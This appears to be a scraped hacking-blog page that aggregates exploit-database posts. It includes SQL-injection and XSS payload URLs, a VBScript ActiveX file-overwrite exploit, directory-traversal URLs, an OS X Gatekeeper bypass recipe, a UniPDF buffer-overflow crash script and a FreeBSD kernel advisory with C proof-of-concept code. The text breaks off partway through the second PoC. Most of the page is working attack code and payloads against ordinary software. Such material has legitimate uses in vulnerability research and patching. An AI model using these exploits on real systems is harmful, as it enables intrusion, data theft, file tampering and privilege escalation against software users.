source: https://www.securityfocus.com/bid/48561/info
eTAWASOL is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/npages/back.asp?id=[SQL]
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863113545
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/48564/info
Classified Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/c-BrowseClassified/q:%5C%22%3E%3Cmarquee%3E%3Ch1%3EXSSed%20By%20r007k17%3C/h1%3E%3C/marquee%3E|p:0|gal:0|typ:|/
source: https://www.securityfocus.com/bid/48582/info
Pro Softnet IDrive Online Backup ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content.
An attacker can exploit this issue to corrupt and overwrite arbitrary files on a victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
IDrive Online Backup ActiveX control 3.4.0 is vulnerable; other versions may also be affected.
<html>
<object classid='clsid:979AE8AA-C206-40EC-ACA7-EC6B6BD7BE5E' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\File_name_to_rewrite_or_create"
arg2=1
arg3="New_File_Content"
target.Text=arg3
target.SelStart=0
target.SelEnd=Len(arg3)
target.SaveToFIle arg1,arg2
End Sub
</script>
</html>
source: https://www.securityfocus.com/bid/48621/info
The 'com_voj' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/ [PATH]/index.php?option=com_voj&task=viewCode&id=215 and 1=1
source: https://www.securityfocus.com/bid/48637/info
Prontus CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/prontus_fonasa/antialone.html?page=javascript:alert%28/XSS/%29;//
http://www.example.com/prontus_senado/antialone.html?page=javascript:alert%28/XSS/%29;//
http://www.example.com/p1_rector/antialone.html?page=javascript:alert%28/XSS/%29;//
source: https://www.securityfocus.com/bid/48639/info
ICMusic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ICMusic 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/demos/icmusic/music.php?music_id=-291+union+all+select+1,@@version,3,4,5,6--
################################################################################################
# #
# ...:::::ManageEngine Firewall Analyzer Directory Traversal/XSS Vulnerabilities::::.... #
# #############################################################################################
Sobhan System Network & Security Group (sobhansys)
-------------------------------------------------------
# Date: 2015-01-28
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/firewall/
# Demo Link: http://demo.fwanalyzer.com/
#Affected version: <= Build Version : 8.0
About ManageEngine Firewall Analyzer (From Vendor Site) :
ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software
that helps network administrators to centrally collect, archive, analyze
their security device logs and generate forensic reports out of it.
--------------------------------------------------------
I'M hadihadi From Virangar Security Team
special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz
greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei
spl:Z.Khodaee
-------
exploit:
Diretory Traversal :
http://127.0.0.1/fw/mindex.do?url=./WEB-INF/web.xml%3f
http://127.0.0.1/fw/index2.do?completeData=true&helpP=archiveAction&tab=system&url=./WEB-INF/web.xml%3f
http://127.0.0.1/fw/index2.do?helpP=fim&link=0&sel=13&tab=system&url=./WEB-INF/web.xml%3f
XSS :
http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseover%3dprompt(902321) bad%3d"
----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)
E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net
# Exploit Title: OS X Gatekeeper bypass Vulnerability
# Date: 01-27-2015
# Exploit Author: Amplia Security Research
# Vendor Homepage: www.apple.com
# Version: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite
# Tested on: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite
# CVE : CVE-2014-8826
Advisory URL :
http://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html
Gatekeeper is a feature available in OS X Lion v10.7.5 and later
versions of OS X.
Gatekeeper performs checks on files and applications downloaded from the
Internet to prevent execution of supposedly malicious and
untrusted/unsigned code.
Gatekeeper provides three different settings:
- Mac App Store (Only apps that came from the Mac App Store can open)
- Mac App Store and identified developers (Only apps that came from the
Mac App Store and identified developers using Gatekeeper can open)
- Anywhere
The default setting is "Mac App Store and identified developers".
This setting prevents execution of any code that was not downloaded from
the Mac App Store and that was not digitally signed by a Developer ID
registered with Apple.
For example, If the user downloads an application from an untrusted
source and double-clicks on the application to execute it, OS X
Gatekeeper will prevent its execution with the following warning message:
"<AppName> can't be opened because it is from an unidentified developer."
(For more information on OS X Gatekeeper, see
http://support.apple.com/kb/ht5290)
We found an attacker can bypass OS X Gatekeeper protections and execute
unsigned malicious code downloaded by the user, even if OS X Gatekeeper
is configured to only allow execution of applications downloaded from
the Mac App Store (the highest security setting).
The exploitation technique is trivial and requires Java to be installed
on the victim's machine.
OS X Gatekeeper prevents execution of downloaded Java Jar (.jar) and
class (.class) files, but this verification can be bypassed.
For example:
- Create a JAR file containing the code to be executed
For example,
File AmpliaTest.java:
public class AmpliaTest {
public static void main(String[] args) {
try { Runtime.getRuntime().exec("/usr/bin/touch /tmp/AMPLIASECURITY");
} catch(Exception e) { }
}
}
(This is just an example, of course, arbitrary code can be executed)
$ javac AmpliaTest.java
Be sure to compile the code for a version of Java lower than or equal to
the one available on the target (for example, javac -target 1.6 -source
1.6 AmpliaTest.java; and the compiled code will work on Java versions >=
1.6) .
$ echo "main-class: AmpliaTest" > Manifest
$ jar cmf Manifest UnsignedCode.jar AmpliaTest.class
- Create a .DMG disk image
For example:
$ hdiutil create -size 5m -fs HFS+ -volname AmpliaSecurity AmpliaTest.dmg
- Mount AmpliaTest.dmg
- Rename UnsignedCode.jar to UnsignedCode (just remove the extension)
- Copy UnsignedCode to the AmpliaSecurity volume
- Unmount AmpliaTest.dmg
- Host the file AmpliaTest.dmg on a web server
- Download AmpliaTest.dmg using Safari and open it
- Double-Click on 'UnsignedCode' and the code will be executed bypassing
OS X Gatekeeper checks (the code creates the file /tmp/AMPLIASECURITY).
(Perform the same steps but without removing the .jar extension to
UnsignedCode.jar and OS X Gatekeeper will prevent execution of the Jar file)
Because the file 'UnsignedCode' has no extension, Finder will display a
blank page icon; the Java/JAR icon will not be displayed. The user does
not know he is double-clicking on a JAR file and the file does not look
particularly suspicious. Also, since the unsigned code is distributed
inside a disk image (.DMG) file, there are many things the attacker can
do to gain the trust of the user (include other files, use Finder
background images, etc).
# Exploit Title: UniPDF v1.1 BufferOverflow, SEH overwrite DoS PoC
# Google Dork: [none]
# Date: 01/28/2015
# Exploit Author: bonze
# Email: dungvtr@gmail.com
# Vendor Homepage: http://unipdf.com/
# Software Link: http://unipdf.com/file/unipdf-setup.exe (Redirect to: http://unipdf-converter.en.softonic.com/download)
# Version: 1.1
# Tested on: Windows 7 SP1 EN
# CVE : [none]
# Note:
# Function MultiByteToWideChar will overwrite RET and SEH pointer, but I can't make exception occur before StackCookie checking
# Please tell me if you have any ideal
#013E8012 |. 68 00020000 PUSH 200 ; /WideBufSize = 200 (512.)
#013E8017 |. 8D8C24 9C0000> LEA ECX,DWORD PTR SS:[ESP+9C] ; |
#013E801E |. 51 PUSH ECX ; |WideCharBuf
#013E801F |. 52 PUSH EDX ; |StringSize
#013E8020 |. 50 PUSH EAX ; |StringToMap
#013E8021 |. 6A 00 PUSH 0 ; |Options
#013E8023 |. 6A 00 PUSH 0 ; |CodePage = CP_ACP
#013E8025 |. FF15 54B45101 CALL NEAR DWORD PTR DS:[<&KERNEL32.Multi> ; \MultiByteToWideChar
#013E802B |. 8D87 08020000 LEA EAX,DWORD PTR DS:[EDI+208]
# At Offset: 327-> overwrite nSEH
# At Offset: 329-> overwrite SEH
# badchar = 0x22
buff2 = "A" * 325
buff2+= "CC" # nSEH
buff2+= "BB" # SEH
crash2 = "<config>\n"
crash2 += " <current Dat=\"1422420474\" />\n"
crash2 += " <Dat Txt=\""+buff2+"\" />\n"
crash2 += "</config>\n"
# Copy file update.xml to UniPDF Application Folder and run UniPDF.exe
file = open("update.xml","w")
file.write(crash2)
file.close()
print "UniPDF v1.1 Crash PoC by bonze at FPT-IS"
print "Email: dungvtr@gmail.com"
print "File Created"
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
FreeBSD Kernel Multiple Vulnerabilities
1. *Advisory Information*
Title: FreeBSD Kernel Multiple Vulnerabilities
Advisory ID: CORE-2015-0003
Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-multiple-vulnerabilities
Date published: 2015-01-27
Date of last update: 2015-01-27
Vendors contacted: FreeBSD
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Unsigned to Signed Conversion Error [CWE-196], Improper Validation of Array Index [CWE-129], Improper Validation of Array Index [CWE-129]
Impact: Code execution, Denial of service
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-0998, CVE-2014-8612, CVE-2014-8612
3. *Vulnerability Description*
FreeBSD is an advanced computer operating system used to power modern servers, desktops and embedded platforms.
A large community has continually developed it for more than thirty years. Its advanced networking,
security and storage features have made FreeBSD the platform of choice for many of the busiest web sites
and most pervasive embedded networking and storage devices.
Multiple vulnerabilities have been found in the FreeBSD kernel code that implements
the vt console driver (previously known as Newcons) and the code that implements SCTP sockets.
These vulnerabilities could allow local unprivileged attackers to disclose kernel memory containing
sensitive information, crash the system, and execute arbitrary code with superuser privileges.
4. *Vulnerable packages*
. FreeBSD 10.1-RELEASE.
Other versions may be affected too but they were no checked.
5. *Non-vulnerable packages*
. FreeBSD 10.1-RELENG.
6. *Vendor Information, Solutions and Workarounds*
The FreeBSD team has released patches for the reported vulnerabilities. You should upgrade to FreeBSD 10.1-RELENG or one of the following releases:
. stable/10, 10.1-STABLE
. releng/10.1, 10.1-RELEASE-p5
. releng/10.0, 10.0-RELEASE-p17
. stable/9, 9.3-STABLE
. releng/9.3, 9.3-RELEASE-p9
. stable/8, 8.4-STABLE
. releng/8.4, 8.4-RELEASE-p23
The vendor publish a security Advisory that can be accessed here[6].
7. *Credits*
This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. *FreeBSD vt Driver VT_WAITACTIVE Sign Conversion Vulnerability*
[CVE-2014-0998]
FreeBSD 10.1-RELEASE added[1] the 'vt(4)'[2] console driver (previously known as Newcons[3]). This new console driver can be enabled by adding the line 'kern.vty=vt' to the '/boot/loader.conf' file and then rebooting the system.
The vt console driver is prone to a sign conversion error when handling the 'VT_WAITACTIVE' ioctl message, which can be ultimately leveraged by a local unprivileged attacker to make the kernel access an array outside of its boundaries.
The vt console driver provides multiple virtual terminals, which are mapped to the '/dev/ttyv*' device nodes. A user can send messages to the vt driver by opening the '/dev/ttyv*' device node belonging to his virtual terminal and then using the 'ioctl' system call.
The function 'vtterm_ioctl' in 'sys/dev/vt/vt_core.c' handles ioctl messages sent to the vt driver. One of the supported messages is called 'VT_WAITACTIVE':
/-----
static int
vtterm_ioctl(struct terminal *tm, u_long cmd, caddr_t data,
struct thread *td)
{
int error, i, s;
[...]
switch (cmd) {
[...]
case VT_WAITACTIVE:
error = 0;
i = *(unsigned int *)data;
if (i > VT_MAXWINDOWS)
return (EINVAL);
if (i != 0)
vw = vd->vd_windows[i - 1];
[...]
-----/
As shown above, when handling the 'VT_WAITACTIVE' ioctl message, the 'data' input buffer (which is fully controlled by the local user) is casted as '(unsigned int *)' in order to read an 'unsigned int' from the input data; however, the read value is stored in the 'i' variable, which has *signed* type 'int'.
This sign conversion error will make possible for a local attacker to bypass the subsequent boundary check that tries to ensure that 'i' is not greater than 'VT_MAXWINDOWS' before using it as an index to access the 'vd->vd_windows' array. This flaw can be leveraged by a local attacker to make the kernel access the 'vd->vd_windows' array outside of its boundaries.
The following disassembly snippet represents the vulnerable code in the FreeBSD kernel binary ('/boot/kernel/kernel'):
/-----
vtterm_ioctl+1306 loc_C09B2506: ; CODE XREF: vtterm_ioctl+D6Cj
vtterm_ioctl+1306 cmp esi, 20047606h ; case VT_WAITACTIVE:
vtterm_ioctl+130C mov ecx, edx ; ecx = vd->vd_windows
vtterm_ioctl+130E mov eax, ebx
vtterm_ioctl+1310 jnz loc_C09B275B
vtterm_ioctl+1316 mov eax, [eax] ; i = *(unsigned int *)data;
vtterm_ioctl+1318 cmp eax, 0Ch ; if (i > VT_MAXWINDOWS)...
vtterm_ioctl+131B mov edi, 16h
vtterm_ioctl+1320 jg loc_C09B2760 ; *** signed comparison!
vtterm_ioctl+1326 test eax, eax ; if (i != 0)...
vtterm_ioctl+1328 jz short loc_C09B2531
vtterm_ioctl+132A mov eax, [ecx+eax*4-4] ; **** vw = vd->vd_windows[i - 1]; ---> access vd->vd_windows outside of its boundaries
vtterm_ioctl+132E mov [ebp+var_30], eax
-----/
8.2. *FreeBSD SCTP Socket SCTP_SS_VALUE Memory Corruption Vulnerability*
[CVE-2014-8612]
FreeBSD implements the Stream Control Transmission Protocol (SCTP).[4]. A userland application can use the 'getsockopt/setsockopt' system calls in order to manipulate the options associated with an SCTP socket.
The FreeBSD kernel is prone to a memory corruption vulnerability when setting the 'SCTP_SS_VALUE' SCTP socket option via the 'setsockopt' system call. This vulnerability can be leveraged by a local unprivileged attacker to corrupt kernel memory with an arbitrary 16-bit value.
The handling of the 'setsockopt' system call at the SCTP level is performed by the function 'sctp_setopt' [file 'sys/netinet/sctp_userreq.c']:
/-----
static int
sctp_setopt(struct socket *so, int optname, void *optval, size_t optsize,
void *p)
{
[...]
switch (optname) {
[...]
case SCTP_SS_VALUE:
{
struct sctp_stream_value *av;
SCTP_CHECK_AND_CAST(av, optval, struct sctp_stream_value, optsize);
SCTP_FIND_STCB(inp, stcb, av->assoc_id);
if (stcb) {
if (stcb->asoc.ss_functions.sctp_ss_set_value(stcb, &stcb->asoc, &stcb->asoc.strmout[av->stream_id],
av->stream_value) < 0) {
-----/
As shown above, when handling the 'SCTP_SS_VALUE' socket option, the 'optval' option value (which is fully controlled by the local user), is casted to the 'struct sctp_stream_value *' type and stored into the 'av' variable by using the 'SCTP_CHECK_AND_CAST' macro. After that, if the 'sctb' pointer is not 'NULL' (condition that can be achieved by having the SCTP socket in a *connected* state), then the 'stcb->asoc.ss_functions.sctp_ss_set_value' function pointer is called. The third argument for this function is '&stcb->asoc.strmout[av->stream_id]'. As can be seen, the unstrusted 'av->stream_id' value (which is fully controlled by the local attacker) is used as an index within the 'stcb->asoc.strmout' array without properly checking if it's within the bounds of the array.
However, note that the memory address calculated using the untrusted index is not dereferenced yet; just the calculated address is passed as an argument to the function, so there is still no memory access at this point.
'stcb->asoc.ss_functions' has type 'struct sctp_ss_functions', which is a struct defined in the file 'sys/netinet/sctp_structs.h' containing several function pointers. One of its members is 'sctp_ss_set_value', which is the one being called when handling the 'SCTP_SS_VALUE' socket option:
/-----
/*
* RS - Structure to hold function pointers to the functions responsible
* for stream scheduling.
*/
struct sctp_ss_functions {
void (*sctp_ss_init) (struct sctp_tcb *stcb, struct sctp_association *asoc,
int holds_lock);
void (*sctp_ss_clear) (struct sctp_tcb *stcb, struct sctp_association *asoc,
int clear_values, int holds_lock);
void (*sctp_ss_init_stream) (struct sctp_stream_out *strq, struct sctp_stream_out *with_strq);
void (*sctp_ss_add_to_stream) (struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, struct sctp_stream_queue_pending *sp, int holds_lock);
int (*sctp_ss_is_empty) (struct sctp_tcb *stcb, struct sctp_association *asoc);
void (*sctp_ss_remove_from_stream) (struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, struct sctp_stream_queue_pending *sp, int holds_lock);
struct sctp_stream_out *(*sctp_ss_select_stream) (struct sctp_tcb *stcb,
struct sctp_nets *net, struct sctp_association *asoc);
void (*sctp_ss_scheduled) (struct sctp_tcb *stcb, struct sctp_nets *net,
struct sctp_association *asoc, struct sctp_stream_out *strq, int moved_how_much);
void (*sctp_ss_packet_done) (struct sctp_tcb *stcb, struct sctp_nets *net,
struct sctp_association *asoc);
int (*sctp_ss_get_value) (struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, uint16_t * value);
int (*sctp_ss_set_value) (struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, uint16_t value);
};
-----/
The file 'sys/netinet/sctp_ss_functions.c' defines an array called 'sctp_ss_functions'; each element of this array has type 'struct sctp_ss_functions' and defines a set of function pointers suitable for different SCTP socket options:
/-----
struct sctp_ss_functions sctp_ss_functions[] = {
/* SCTP_SS_DEFAULT */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_default_clear,
.sctp_ss_init_stream = sctp_ss_default_init_stream,
.sctp_ss_add_to_stream = sctp_ss_default_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_default_remove,
.sctp_ss_select_stream = sctp_ss_default_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
},
/* SCTP_SS_ROUND_ROBIN */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_default_clear,
.sctp_ss_init_stream = sctp_ss_default_init_stream,
.sctp_ss_add_to_stream = sctp_ss_rr_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_default_remove,
.sctp_ss_select_stream = sctp_ss_default_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
},
/* SCTP_SS_ROUND_ROBIN_PACKET */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_default_clear,
.sctp_ss_init_stream = sctp_ss_default_init_stream,
.sctp_ss_add_to_stream = sctp_ss_rr_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_default_remove,
.sctp_ss_select_stream = sctp_ss_rrp_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_rrp_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
},
/* SCTP_SS_PRIORITY */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_prio_clear,
.sctp_ss_init_stream = sctp_ss_prio_init_stream,
.sctp_ss_add_to_stream = sctp_ss_prio_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_prio_remove,
.sctp_ss_select_stream = sctp_ss_prio_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_prio_get_value,
.sctp_ss_set_value = sctp_ss_prio_set_value
},
/* SCTP_SS_FAIR_BANDWITH */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_fb_clear,
.sctp_ss_init_stream = sctp_ss_fb_init_stream,
.sctp_ss_add_to_stream = sctp_ss_fb_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_fb_remove,
.sctp_ss_select_stream = sctp_ss_fb_select,
.sctp_ss_scheduled = sctp_ss_fb_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
},
/* SCTP_SS_FIRST_COME */
{
.sctp_ss_init = sctp_ss_fcfs_init,
.sctp_ss_clear = sctp_ss_fcfs_clear,
.sctp_ss_init_stream = sctp_ss_fcfs_init_stream,
.sctp_ss_add_to_stream = sctp_ss_fcfs_add,
.sctp_ss_is_empty = sctp_ss_fcfs_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_fcfs_remove,
.sctp_ss_select_stream = sctp_ss_fcfs_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
}
};
-----/
Note that the value for the 'sctp_ss_set_value' field is *almost* always set to 'sctp_ss_default_set_value', which is just a dummy function defined in 'sys/netinet/sctp_ss_functions.c':
/-----
static int
sctp_ss_default_set_value(struct sctp_tcb *stcb SCTP_UNUSED, struct sctp_association *asoc SCTP_UNUSED,
struct sctp_stream_out *strq SCTP_UNUSED, uint16_t value SCTP_UNUSED)
{
/* Nothing to be done here */
return (-1);
}
-----/
The only case in which the 'sctp_ss_set_value' field is set to a different value is in the 4th element of the array, which corresponds to the 'SCTP_SS_PRIORITY' socket option; in that case, the function pointer is set to 'sctp_ss_prio_set_value', which is a function defined in 'sys/netinet/sctp_ss_functions.c':
/-----
static int
sctp_ss_prio_set_value(struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, uint16_t value)
{
if (strq == NULL) {
return (-1);
}
strq->ss_params.prio.priority = value;
sctp_ss_prio_remove(stcb, asoc, strq, NULL, 1);
sctp_ss_prio_add(stcb, asoc, strq, NULL, 1);
return (1);
}
-----/
The 'value' parameter is fully controlled by the attacker, and the actual value of the 'strq' pointer parameter is the address '&stcb->asoc.strmout[av->stream_id]' in which the attacker can set the 'av->stream_id' index beyond the boundaries of the array, so this function will provide a write-what-where memory corruption primitive when doing the 'strq->ss_params.prio.priority = value' assignment. This memory corruption vulnerability allows a local unprivileged attacker to overwrite kernel memory outside of the 'stcb->asoc.strmout' array with an arbitrary 'uint16_t' value.
In order to make use of the 'sctp_ss_prio_set_value' function, the attacker needs to set up the 'stcb->asoc.ss_functions' struct with the function pointers belonging to the 'SCTP_SS_PRIORITY' socket option. This can be done by hitting the following code in the 'sctp_setopt' function; as can be seen, the 'stcb->asoc.ss_functions' struct can be properly set up for the attack by setting an 'SCTP_PLUGGABLE_SS' socket option with an option value of type 'struct sctp_assoc_value' having its 'assoc_value' field set to 'SCTP_SS_PRIORITY' (see the 'stcb->asoc.ss_functions = sctp_ss_functions[av->assoc_value] ' statement):
/-----
case SCTP_PLUGGABLE_SS:
{
struct sctp_assoc_value *av;
SCTP_CHECK_AND_CAST(av, optval, struct sctp_assoc_value, optsize);
/* Checks if av->assoc_value is a valid index within the sctp_ss_functions array */
if ((av->assoc_value != SCTP_SS_DEFAULT) &&
(av->assoc_value != SCTP_SS_ROUND_ROBIN) &&
(av->assoc_value != SCTP_SS_ROUND_ROBIN_PACKET) &&
(av->assoc_value != SCTP_SS_PRIORITY) &&
(av->assoc_value != SCTP_SS_FAIR_BANDWITH) &&
(av->assoc_value != SCTP_SS_FIRST_COME)) {
SCTP_LTRACE_ERR_RET(inp, NULL, NULL, SCTP_FROM_SCTP_USRREQ, EINVAL);
error = EINVAL;
break;
}
SCTP_FIND_STCB(inp, stcb, av->assoc_id);
if (stcb) {
stcb->asoc.ss_functions.sctp_ss_clear(stcb, &stcb->asoc, 1, 1);
/* The function pointers struct is set up here!!! */
stcb->asoc.ss_functions = sctp_ss_functions[av->assoc_value];
stcb->asoc.stream_scheduling_module = av->assoc_value;
stcb->asoc.ss_functions.sctp_ss_init(stcb, &stcb->asoc, 1);
SCTP_TCB_UNLOCK(stcb);
-----/
8.3. *FreeBSD SCTP Socket SCTP_SS_VALUE Kernel Memory Disclosure Vulnerability*
[CVE-2014-8612]
The third vulnerability is closely related to the second one. The FreeBSD kernel is prone to a kernel memory disclosure when reading the value of the 'SCTP_SS_VALUE' SCTP socket option via the 'getsockopt' system call, which allows local unprivileged attackers to read 16-bit values belonging to the kernel memory space.
The handling of the 'getsockopt' system call at the SCTP level is performed by the function 'sctp_getopt' [file 'sys/netinet/sctp_userreq.c']:
/-----
static int
sctp_getopt(struct socket *so, int optname, void *optval, size_t *optsize,
void *p)
{
[...]
switch (optname) {
[...]
case SCTP_SS_VALUE:
{
struct sctp_stream_value *av;
SCTP_CHECK_AND_CAST(av, optval, struct sctp_stream_value, *optsize);
SCTP_FIND_STCB(inp, stcb, av->assoc_id);
if (stcb) {
if (stcb->asoc.ss_functions.sctp_ss_get_value(stcb, &stcb->asoc, &stcb->asoc.strmout[av->stream_id],
&av->stream_value) < 0) {
-----/
When handling the 'SCTP_SS_VALUE' socket option, the 'optval' option value (which is fully controlled by the local attacker), is casted to the 'struct sctp_stream_value *' type and stored into the 'av' variable by using the 'SCTP_CHECK_AND_CAST' macro. After that, if the 'sctb' pointer is not 'NULL' (condition that can be achieved by having the SCTP socket in a *connected* state), the 'stcb->asoc.ss_functions.sctp_ss_get_value' function pointer is called. The third argument for this function is '&stcb->asoc.strmout[av->stream_id]'. As can be seen, the unstrusted 'av->stream_id' value (which is fully controlled by the local attacker) is used as an index within the 'stcb->asoc.strmout' array without properly checking if it's within the bounds of the array.
The default value for the 'sctp_ss_get_value' function pointer is 'sctp_ss_default_get_value', which is just a dummy function defined in 'sys/netinet/sctp_ss_functions.c':
/-----
static int
sctp_ss_default_get_value(struct sctp_tcb *stcb SCTP_UNUSED, struct sctp_association *asoc SCTP_UNUSED,
struct sctp_stream_out *strq SCTP_UNUSED, uint16_t * value SCTP_UNUSED)
{
/* Nothing to be done here */
return (-1);
}
-----/
The only useful possible value for this function pointer is 'sctp_ss_prio_get_value', which belongs to the function pointers of the 'SCTP_SS_PRIORITY' socket option:
/-----
static int
sctp_ss_prio_get_value(struct sctp_tcb *stcb SCTP_UNUSED, struct sctp_association *asoc SCTP_UNUSED,
struct sctp_stream_out *strq, uint16_t * value)
{
if (strq == NULL) {
return (-1);
}
*value = strq->ss_params.prio.priority;
return (1);
}
-----/
The actual value of the 'strq' pointer parameter is the address '&stcb->asoc.strmout[av->stream_id]' in which the attacker can set the 'av->stream_id' index beyond the boundaries of the array, so this function will allow a local unprivileged attacker to read an 'uint16_t' value belonging to the kernel memory outside of the 'stcb->asoc.strmout' array when doing the '*value = strq->ss_params.prio.priority' assignment.
In order to make use of the 'sctp_ss_prio_get_value' function, the attacker needs to set up the 'stcb->asoc.ss_functions' struct with the function pointers belonging to the 'SCTP_SS_PRIORITY' socket option, as it was previously explained for the second vulnerability.
8.4. *Proof of Concept*
The following code is a Proof of Concept for the first vulnerability:
/-----
#include <stdio.h>
#include <sys/consio.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char **argv){
int fd;
printf("** FreeBSD vt Driver VT_WAITACTIVE Sign Conversion Vulnerability PoC **\n");
if (argc < 2){
printf("\nUsage: ./poc_vt </dev/ttyv*>, where ttyv* is your current virtual terminal.\n");
printf("\nExample: ./poc_vt /dev/ttyv1\n\n");
exit(1);
}
fd = open(argv[1], O_RDONLY);
if (fd == -1){
perror("open");
exit(1);
}
/* 0x90919293 is a negative number when it's interpreted as a signed int, thus it will bypass the
* (signed) boundary check that tries to guarantee that this value is not greater than VT_MAXWINDOWS (12).
* This value will be ultimately used as an index to access the vd->vd_windows array.
*/
if (ioctl(fd, VT_WAITACTIVE, (void *) 0x90919293) == -1){
perror("ioctl");
}
close(fd);
return 0;
}
-----/
The following code is a Proof of Concept for the second vulnerability:
/-----
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <netinet/sctp_uio.h>
#include <arpa/inet.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define PORT 4444
#define ADDR "127.0.0.1"
int main(int argc, char *argv[]) {
int fd;
struct sockaddr_in addr;
struct sctp_initmsg init;
struct sctp_stream_value stream_value;
struct sctp_assoc_value assoc_value;
socklen_t opt_len;
printf("** FreeBSD SCTP Socket SCTP_SS_VALUE Memory Corruption Vulnerability PoC **\n");
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)) < 0) {
perror("socket");
goto out;
}
memset(&init, 0, sizeof(init));
init.sinit_num_ostreams = 2048;
if (setsockopt(fd, IPPROTO_SCTP, SCTP_INITMSG, &init, (socklen_t)sizeof(struct sctp_initmsg)) < 0) {
perror("SCTP_INITMSG");
goto out;
}
memset(&addr, 0, sizeof(addr));
#ifdef HAVE_SIN_LEN
addr.sin_len = sizeof(struct sockaddr_in);
#endif
addr.sin_family = AF_INET;
